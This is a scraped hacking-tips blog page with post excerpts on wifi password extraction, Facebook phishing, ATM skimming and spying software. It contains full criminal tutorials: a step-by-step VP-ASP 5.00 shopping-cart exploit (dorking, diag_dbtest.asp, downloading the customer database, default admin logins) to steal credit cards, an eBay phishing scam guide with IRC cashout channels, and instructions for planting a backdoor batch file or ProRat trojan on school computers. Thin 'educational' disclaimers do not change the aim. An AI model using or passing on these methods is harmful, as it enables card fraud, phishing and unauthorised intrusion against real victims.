Here is the wifi tricks 2015 – I’m going to share a trick on How To View Saved Wifi Passwords In Android. Android device is very smart and intelligent. You find lots of secrets in android device.Here is the method by which you can easily extract all saved wifi passwords in your android device. Actually all these passwords get saves in the internal reserved memory of an android device . Without having root privilege you can not acess this memory ,but after rooting an android device it is possible to get into the root folders and files . By this we can easily extract all and view saved wifi passwords in android 2015.
This blog is about latest hacking tips, hacking tutorial, hacking tools, system hacking, cyber crime investigation and etc....
Showing posts with label Hacking Tips. Show all posts
Showing posts with label Hacking Tips. Show all posts
Wednesday, 11 March 2015
View Saved Wifi Passwords In Android 2015
Here is the wifi tricks 2015 – I’m going to share a trick on How To View Saved Wifi Passwords In Android. Android device is very smart and intelligent. You find lots of secrets in android device.Here is the method by which you can easily extract all saved wifi passwords in your android device. Actually all these passwords get saves in the internal reserved memory of an android device . Without having root privilege you can not acess this memory ,but after rooting an android device it is possible to get into the root folders and files . By this we can easily extract all and view saved wifi passwords in android 2015.
Friday, 27 September 2013
Phishing Techniques
3 Methods Which Hackers Perform for Facebook Phishing Hacking
3 Methods Which Hackers Perform for Facebook Phishing Hacking
In Previous Article we studied How Hackers Perform Facebook Hacking and How they use Keyloggers for it. Now we are Going to Discuss How the Facebook Phishing is Performed. In simple Words Facebook Phishing is Performed using Fake Login Pages which redirect to the Real Pages but stores the User Name and Password entered for the Page. Hence the Victim does not get suspicious after Logging in and Chances of changing the Password are neutralized. Now we Will Discuss various methods Performed by the Hackers to do Facebook Phishing.Monday, 16 September 2013
How To Hide Text In Images (Steganography)
How To Hide Text In Images
Steganography is the art and science of writing hidden messages in such a way that no one, apart from the sender and intended recipient, suspects the existence of the message, a form of security through obscurity. By using this trick your text will get hidden into any image of your choice without increasing its size or without reducing its quality. Your data will be encrypted in the image with RC_4 encryption plus SHA hashing. So, there is no need to worry that it can be easily cracked by anybody.
Saturday, 14 September 2013
How to Send Anonymous Email To Victim
Phishing is one of the most useful and simple methods
for hacking email accounts. When using phishing you need to send an email to
your victim that contains the link to your phisher page. The victim will click
on this link only if he finds the mail genuine, so we need a fake mailer to
make this mail appear genuine.
Saturday, 3 August 2013
View or Hack Unprotected Live Cameras Using Google
In this tutorial i will teach you to
hack or view unprotected cam using a simple google trick. Using this trick you
can see live view of streets in china or america. Inner view of some office and
lot more. Lets dive into it.
How
To View Unprotected Cam ?
Wednesday, 31 July 2013
How To Bypass Surveys
Hey guys today i am gonna provide you working tricks that
How To Bypass Survey There are lot of software and lot of website to bypass
survey But not working fine with bypass survey they all are fake website’s
won’t work anymore. sometimes when you find some software and some things you
need some of f$uker add survey in that links so you need to complete survey and
that survey are very bullshit it takes long time to complete and some time you
can’t complete that survey after one it said your ip had already complete the
survey and some times when you complete survey it don’t let you download the
file so that are very irritating and time wasting. there are ShareCash.com
,fileice.com that are survey website that are very irritating survey’s
Tuesday, 9 July 2013
The Automated Mobile Spying Software

Spying Software is all about monitoring people on their cell phone activities, and mostly they are used by employers and parents.
Employers are always at danger
Organizations need to keep an eye on their employees to make sure
they do not waste time on their cell phones during work hours, and for
the purpose of catching employee’s gone rogue.
Hacking A Servers: A Beginner's Guide
I am asked at least 5 or more times a day by young, beginning "hackers", "How can I hack?" or "Is there a way to hack a web site?" Well there is. There are, in fact, literally hundreds of ways to do this. I will discuss a few in this text to get you started. Every hacker has to start somehow and hacking web servers and ftp servers is one of the easiest ways. If you are reading this I am assuming that you already have a basic knowledge of how web servers work and how to use some form of UNIX. But I am going to explain that stuff anyway for those of you who don't know.
Tuesday, 2 July 2013
Monday, 1 July 2013
How to HACK ANY SKYPE ACCOUNT in 10 Minutes or Less!
If you ever wanted to see if someone
could hack your skype, or pull a prank on a friend, this tutorial is for you.
Keep in mind doing this without the account owner's permission is illegal. This
hack is accomplished through simple
Step
1: Get Information
For this tutorial, you need to know
the Skype username, e-mail address associated with it, the country the user is
from, and 3 contacts the user has. If you don't know the e-mail, that's okay.
Friday, 14 June 2013
Top 3 Ways to Hack ATM & Protection Against ATM Hacking
ATM hacking is from past is the first interest of every
computer hacker.And in this article i will talk about ATM Hacking, things like
how ATM Works , What are the vulnerabilities available to exploit and last but
not least YES, how to patch them. So starting from the first how ATM works.
Warning:- Hacking ATM is highly illegal. Can Put you into cell for minimum 3 years along with fine 7 lac.This article is just for education purpose only do respect the law in your country, the author of the tutorial do not held any responsibility of the act or trails performed by you after reading the article.
How ATM Works
An ATM is simply a data terminal with two input and four
output devices. Like any other data terminal, the ATM has to connect to, and
communicate through, a host processor. The host processor is
analogous to an nternet Service Provider (ISP) in that it is the gateway
through which all the various ATM networks become available to the cardholder
(the person wanting the cash).
Most host processors can support either leased-line or dial-up machines.
Leased-line machines connect directly to the host processor through a
four-wire, point-to-point, dedicated telephone line. Dial-up ATMs connect to
the host processor through a normal phone line using a modem and a toll-free
number, or through an Internet service provider using a local access number
dialed by modem.
Leased-line ATMs are preferred for very high-volume
locations because of their thru-put capability, and dial-up
ATMs are preferred for retail merchant locations where cost is a greater factor
than thru-put. The initial cost for a dial-up machine is less than half that
for a leased-line machine. The monthly operating costs for dial-up are only a
fraction of the costs for leased-line.
The host processor may be owned by a bank or financial
institution, or it may be owned by an independent service provider. Bank-owned
processors normally support only bank-owned machines, whereas the independent
processors support merchant-owned machines.
Warning:- Hacking ATM is highly illegal. Can Put you into
cell for minimum 3 years along with fine 7 lac.This article is just for
education purpose only do respect the law in your country, the author of the
tutorial do not held any responsibility of the act or trails performed by you
after reading the article.
Methods of Hacking ATM 1. Magnetic Reader
Most ATM hackers have a device called Magnetic Reader which they attach over
the card slot on the ATM, and as any one pin the card inside automatically it
reads the magnetic information. And with the advancement of time the with the
help of wireless technology, the magnetic reader automatically transmitted the
details to fraudsters in a nearby location.
2. Hidden Camera
Obviously this is one of the easy method to hack an ATM machine but this is
something more than hack, here we are not penetrating the ATM. As we all know
our ATM is protected by a PIN which acts as our password so if some one have to
get money after stealing our card he/she should have the PIN code too,
these days criminals have a solution for this too.
3. They enter into the ATM when guard is outside put hand on the ATM cam and silently in 5 or 6 seconds, just install a hidden camera near by the keypad of the ATM from the user enter his/her PIN CODE, and again using the latest technology (wireless) and the PIN is digitally recorded and now hacker have the choice whether he want to get the details remotly or he/she will go to ATM and get the details by himself/herself.
3. They enter into the ATM when guard is outside put hand on the ATM cam and silently in 5 or 6 seconds, just install a hidden camera near by the keypad of the ATM from the user enter his/her PIN CODE, and again using the latest technology (wireless) and the PIN is digitally recorded and now hacker have the choice whether he want to get the details remotly or he/she will go to ATM and get the details by himself/herself.
Protection Against ATM Hacking
1. Do Hide the keypad when you enter your PIN CODE.
2. See All around if found any camera which you think not supposed to be there do inform the ATM guard and the near by Bank.
3. DO confirm completeness of the transaction after getting the money most people get trapped into this as the said above in second method.
4. If any criminal caught to and say to extract money from ATM, to save your money just reverse your PIN Account number. Like if my PIN CODE is 1234, if some one having PIN Code like 7777 then just put a 0 (Zero) in the last digit, money will stuck half in the ATM and half outside.
Hope you like the article :)
Warning:- This article is just for education purpose only do respect the law in your country, the author of the tutorial do not held any responsibility of the act or trails performed by you after reading the article.
2. See All around if found any camera which you think not supposed to be there do inform the ATM guard and the near by Bank.
3. DO confirm completeness of the transaction after getting the money most people get trapped into this as the said above in second method.
4. If any criminal caught to and say to extract money from ATM, to save your money just reverse your PIN Account number. Like if my PIN CODE is 1234, if some one having PIN Code like 7777 then just put a 0 (Zero) in the last digit, money will stuck half in the ATM and half outside.
Hope you like the article :)
Warning:- This article is just for education purpose only do respect the law in your country, the author of the tutorial do not held any responsibility of the act or trails performed by you after reading the article.
Monday, 10 June 2013
Hacking Biometrics (Fooling A Fingerprint Scanner )
Fooling
A Fingerprint Scanner
Creating
an artificial finger
Fingerprint
recognition is based on the fact that every human being has a unique pattern of
ridges and valleys on their fingertips. The scanner makes a copy of your
fingerprint and compares its characteristics to the ones stored beforehand.
These characteristics are measured based on special points (such as branches
and loops) on a print. In figure 1.1 can be seen some of these special points.
The scanner uses these points as coordinates to define other branches, loops,
beginning of lines, number of lines etc.
Download full pdf from here ==> Click Here <==For Password ==> Click Here <==
How to Hack a Credit Card
Hi
there. This is my first serious "black hat hacking" post of credit
cards hacking. Here will be explained all methods used to hack credit cards and
bank accounts with lots of $$ it. Now I'm sure most of you think that this is
fake or scam, but i want to just tell u this is real and the only working
method (in my opinion) to hack a credit card and make your wish come true (lol,
hope it doesn't sound like a commercial).
This tutorial is divided in two
parts.
- Introduction into Credit Cards
- Credit card Hacking
Note: Hacking credit cards is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial. This post is for educational purposes only.
Lets start with some easy terms.
What is credit card ?
Credit cards are of two types:
- Debit Card
- Credit Card
1. Debit means u have a sum of
amount in it and u can use them.
2. Credit means u have a credit line limit like of $10000 and u can use them and by the end of month pay it to bank.
To use a credit card on internet u just not need cc number and expiry but u need many info like :
2. Credit means u have a credit line limit like of $10000 and u can use them and by the end of month pay it to bank.
To use a credit card on internet u just not need cc number and expiry but u need many info like :
- First name
- Last name
- Address
- City
- State
- Zip
- Country
- Phone
- CC number
- Expiry
- CVV2 ( this is 3digit security code on backside after signature panel )
If you get that info you can use
that to buy any thing on internet, like software license, porn site membership,
proxy membership, or any thing (online services usually, like webhosting,
domains).
If u want to make money $ through hacking then you need to be very lucky... you need to have a exact bank and bin to cash that credit card through ATM machines.
Let me explain how ?
First study some simple terms.
BINS = first 6 digit of every credit card is called " BIN " (for example cc number is : 4121638430101157 then its bin is " 412163 "), i hope this is easy to understand.
Now the question is how to make money through credit cards. Its strange..., well you cant do that, but there is specific persons in world who can do that. They call them selves " cashiers ". You can take some time to find a reliable cashiers.
Now the question is every bank credit cards are cashable and every bin is cashable? Like citibank, bank of america , mbna .. are all banks are cashables ? Well answer is " NO ". If u know some thing, a little thing about banking system, have u ever heard what is ATM machines? Where u withdraw ur cash by putting ur card in.
Every bank don't have ATM, every bank don't support ATM machines cashout. Only few banks support with their few bins (as u know bin is first 6 digit of any credit / debit card number), for suppose bank of america. That bank not have only 1 bin, that bank is assigned like, 412345 412370 are ur bins u can make credit cards on them. So bank divide the country citi location wise, like from 412345 - 412360 is for americans, after that for outsiders and like this. I hope u understand. So all bins of the same bank are even not cashable, like for suppose they support ATM in New York and not in California, so like the bins of California of same bank will be uncashable. So always make sure that the bins and banks are 100% cashable in market by many cashiers.
Be sure cashiers are legit, because many cashiers r there which take your credit card and rip u off and don't send your 50% share back.
You can also find some cashiers on mIRC *( /server irc.unixirc.net:6667 ) channel : #cashout, #ccpower
Well, check the website where u have list of bins and banks mostly 101% cashable. If u get the credit card of the same bank with same bin, then u can cashout otherwise not . Remember for using credit card on internet u don't need PIN ( 4 words password which u enter in ATM Machine ), but for cashout u need. You can get pins only by 2nd method of hacking which i still not post but i will. First method of sql injection and shopadmin hacking don't provide with pins, it only give cc numb cvv2 and other info which usually need for shopping not for cashing.
Credit Card Hacking
CC (Credit Cards) can be hacked by two ways:
If u want to make money $ through hacking then you need to be very lucky... you need to have a exact bank and bin to cash that credit card through ATM machines.
Let me explain how ?
First study some simple terms.
BINS = first 6 digit of every credit card is called " BIN " (for example cc number is : 4121638430101157 then its bin is " 412163 "), i hope this is easy to understand.
Now the question is how to make money through credit cards. Its strange..., well you cant do that, but there is specific persons in world who can do that. They call them selves " cashiers ". You can take some time to find a reliable cashiers.
Now the question is every bank credit cards are cashable and every bin is cashable? Like citibank, bank of america , mbna .. are all banks are cashables ? Well answer is " NO ". If u know some thing, a little thing about banking system, have u ever heard what is ATM machines? Where u withdraw ur cash by putting ur card in.
Every bank don't have ATM, every bank don't support ATM machines cashout. Only few banks support with their few bins (as u know bin is first 6 digit of any credit / debit card number), for suppose bank of america. That bank not have only 1 bin, that bank is assigned like, 412345 412370 are ur bins u can make credit cards on them. So bank divide the country citi location wise, like from 412345 - 412360 is for americans, after that for outsiders and like this. I hope u understand. So all bins of the same bank are even not cashable, like for suppose they support ATM in New York and not in California, so like the bins of California of same bank will be uncashable. So always make sure that the bins and banks are 100% cashable in market by many cashiers.
Be sure cashiers are legit, because many cashiers r there which take your credit card and rip u off and don't send your 50% share back.
You can also find some cashiers on mIRC *( /server irc.unixirc.net:6667 ) channel : #cashout, #ccpower
Well, check the website where u have list of bins and banks mostly 101% cashable. If u get the credit card of the same bank with same bin, then u can cashout otherwise not . Remember for using credit card on internet u don't need PIN ( 4 words password which u enter in ATM Machine ), but for cashout u need. You can get pins only by 2nd method of hacking which i still not post but i will. First method of sql injection and shopadmin hacking don't provide with pins, it only give cc numb cvv2 and other info which usually need for shopping not for cashing.
Credit Card Hacking
CC (Credit Cards) can be hacked by two ways:
- Credit Card Scams ( usually used for earning money , some times for shopping )
- Credit Card Shopadmin Hacking ( just for fun, knowledge, shopping on internet )
1. Shopadmin Hacking
This method is used for testing the knowledge or for getting the credit card for shopping on internet, or for fun, or any way but not for cashing ( because this method don't give PIN - 4 digit passcode ) only gives cc numb , cvv2 and other basic info.
Shopadmins are of different companies, like: VP-ASP , X CART, etc. This tutorial is for hacking VP-ASP SHOP.
I hope u seen whenever u try to buy some thing on internet with cc, they show u a well programmed form, very secure. They are carts, like vp-asp xcarts. Specific sites are not hacked, but carts are hacked.
Below I'm posting tutorial to hack VP ASP cart. Now every site which use that cart can be hacked, and through their *mdb file u can get their clients 'credit card details', and also login name and password of their admin area, and all other info of clients and comapny secrets.
Lets start:
Type: VP-ASP Shopping Cart
Version: 5.00
How to find VP-ASP 5.00 sites?
Finding VP-ASP 5.00 sites is so simple...
1. Go to google.com and type: VP-ASP Shopping Cart 5.00
2. You will find many websites with VP-ASP 5.00 cart software installed
Now let's go to the exploit..
The page will be like this: ****://***.victim.com/shop/shopdisplaycategories.asp
The exploit is: diag_dbtest.asp
Now you need to do this: ****://***.victim.com/shop/diag_dbtest.asp
A page will appear contain those:
This method is used for testing the knowledge or for getting the credit card for shopping on internet, or for fun, or any way but not for cashing ( because this method don't give PIN - 4 digit passcode ) only gives cc numb , cvv2 and other basic info.
Shopadmins are of different companies, like: VP-ASP , X CART, etc. This tutorial is for hacking VP-ASP SHOP.
I hope u seen whenever u try to buy some thing on internet with cc, they show u a well programmed form, very secure. They are carts, like vp-asp xcarts. Specific sites are not hacked, but carts are hacked.
Below I'm posting tutorial to hack VP ASP cart. Now every site which use that cart can be hacked, and through their *mdb file u can get their clients 'credit card details', and also login name and password of their admin area, and all other info of clients and comapny secrets.
Lets start:
Type: VP-ASP Shopping Cart
Version: 5.00
How to find VP-ASP 5.00 sites?
Finding VP-ASP 5.00 sites is so simple...
1. Go to google.com and type: VP-ASP Shopping Cart 5.00
2. You will find many websites with VP-ASP 5.00 cart software installed
Now let's go to the exploit..
The page will be like this: ****://***.victim.com/shop/shopdisplaycategories.asp
The exploit is: diag_dbtest.asp
Now you need to do this: ****://***.victim.com/shop/diag_dbtest.asp
A page will appear contain those:
- xDatabase
- shopping140
- xDblocation
- resx
- xdatabasetypexEmailxEmail NamexEmailSubjectxEmailSy stemxEmailTypexOrdernumbe r
The most important thing here is xDatabase
xDatabase: shopping140
Ok, now the URL will be like this: ****://***.victim.com/shop/shopping140.mdb
If you didn't download the Database, try this while there is dblocation:
xDblocation
resx
the url will be: ****://***.victim.com/shop/resx/shopping140.mdb
If u see the error message you have to try this :
****://***.victim.com/shop/shopping500.mdb
Download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com, or use MS Office Access.
Inside you should be able to find credit card information, and you should even be able to find the admin username and password for the website.
The admin login page is usually located here: ****://***.victim.com/shop/shopadmin.asp
If you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all, then try to find the admin login page and enter the default passwords which are:
Username: admin
password: admin
OR
Username: vpasp
password: vpasp
2. Hacking Through Scams
This method is usually used to hack for earning money. What happens in this method is you create a clone page.
Target: its basically eBay.com or paypal.com for general credit cards, or if u want to target any specific cashable bank like regionbank.com then u have to create a clone page for that bank.
What is eBay.com?
Its a shopping site world wide which is used by many of billion people which use their credit cards on ebay. What you do make a similar page same as eBay and upload it on some hosting which don't have any law restrictions, try to find hosting in Europe they will make your scam up for long time, and email the users of eBay.
How to get the emails of their users?
Go to google.com and type "Email Harvestor" or any Email Spider and search for eBay Buyers and eBay Sellers and u will get long list. That list is not accurate but out of 1000 atleast 1 email would be valid. Atleast you will get some time.
Well u create a clone page of ebay, and mail the list u create from spider with message, like "Your account has been hacked" or any reason that looks professional, and ask them to visit the link below and enter your info billing, and the scam page have programming when they enter their info it comes directly to your email.
In the form page u have PIN required so u also get the PIN number through which u can cash through ATM ..
Now if u run ebay scam or paypal scam, its up to your luck who's your victim. A client of bank of america or of citibank or of region, its about luck, maybe u get cashable, may be u don't its just luck, nothing else.
Search on google to download a scam site and study it !
After you create your scam site, just find some email harvestor or spider from internet (download good one at Bulk Email Software Superstore - Email Marketing Internet Advertising) and create a good email list.
And you need to find a mailer (mass sending mailer) which send mass - emails to all emails with the message of updating their account on ur scam page ). In from to, use email eBay@reply3.ebay.com and in subject use : eBay - Update Your eBay Account and in Name use eBay
Some Instructions:
1. Make sure your hosting remains up or the link in the email u will send, and when your victim emails visit it, it will show page cannot be displayed, and your plan will be failed.
2. Hardest point is to find hosting which remains up in scam. even i don't find it easily, its very very hard part.
3. Maybe u have contacts with someone who own hosting company and co locations or dedicated he can hide your scam in some of dedicated without restrictions.
4. Finding a good email list (good means = actually users)
5. Your mass mailing software land the emails in inbox of users.
That's all folks. Hope you will find this tutorial useful. And remember, hacking credit cards is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial.
How To Hack Your School Network
Because of the frequency this
question has been asked on this blog, i have decided to create a document for
this question. This tutorial is for those newbies out there, wanting to
"hack" their school. I'm gonna start by saying, if your going to hack
the school, theres a high probability your get caught, and don't do anything
dumb like deleting the network. Its lame, and you will get flamed for doing it.
This hack will allow you to take control of the PC's at school. Lets start:
How to take control of the PC's at school:
Here are the steps;
How to take control of the PC's at school:
Here are the steps;
- Preparing The Virus
- Setting Up The Virus
- Controlling The PC
Obviously, if you gonna take control over your school PC you need a virus. You have 2 methods:
- The virus I made which is harmless and you won't even notice it was executed.
- Dropping a Trojan on the school PC.
Method 1
What you need:
What you need:
- Pen Drive (You can buy one, or you just use yours)
- Brain (You can't buy this)
Now, open notepad and copy/paste this code: the code
Save the file as something.bat (you can change something to whatever you want). In "Save as type:" choose "All Files".
Save the file as something.bat (you can change something to whatever you want). In "Save as type:" choose "All Files".

I strongly recommend you not to change the rdport and tnport
configuration. The rdport will open the remote desktop default port, and the
tnport will open the telnet's client default port.
You can change the username, password and the rport (randomn port you choose to be opened)
At ipconfig /all >> C:\attach.txt you must change C:/ by your pen drive letter.
Save it and remove your pen drive.
Take your pen drive to school and run the bat file. Don't forget the pc you runned it in cause you might need it.
When you get home go to your pc and try to telnet them or remote desktop the PC.
Method 2:
In this method we will use a Trojan to control the school PC.
Here is a tutorial about how to create a Trojan: ProRat Trojan
Now just create a server (there is an explanation in the tutorial above), bind it and put it into your pen drive. Make sure you leave your PC turned on.
Then go to your school and drop the trojan.
Other way to do this is to give your trojan to a friend and tell him to stay in school. When you arrive home, send him a SMS and tell him to drop the trojan. This way you could even see if it worked.
After this you can probably do whatever you want with the PC.
Do you have questions, comments, or suggestions? Feel free to post a comment!
You can change the username, password and the rport (randomn port you choose to be opened)
At ipconfig /all >> C:\attach.txt you must change C:/ by your pen drive letter.
Save it and remove your pen drive.
Take your pen drive to school and run the bat file. Don't forget the pc you runned it in cause you might need it.
When you get home go to your pc and try to telnet them or remote desktop the PC.
Method 2:
In this method we will use a Trojan to control the school PC.
Here is a tutorial about how to create a Trojan: ProRat Trojan
Now just create a server (there is an explanation in the tutorial above), bind it and put it into your pen drive. Make sure you leave your PC turned on.
Then go to your school and drop the trojan.
Other way to do this is to give your trojan to a friend and tell him to stay in school. When you arrive home, send him a SMS and tell him to drop the trojan. This way you could even see if it worked.
After this you can probably do whatever you want with the PC.
Do you have questions, comments, or suggestions? Feel free to post a comment!
Subscribe to:
Posts (Atom)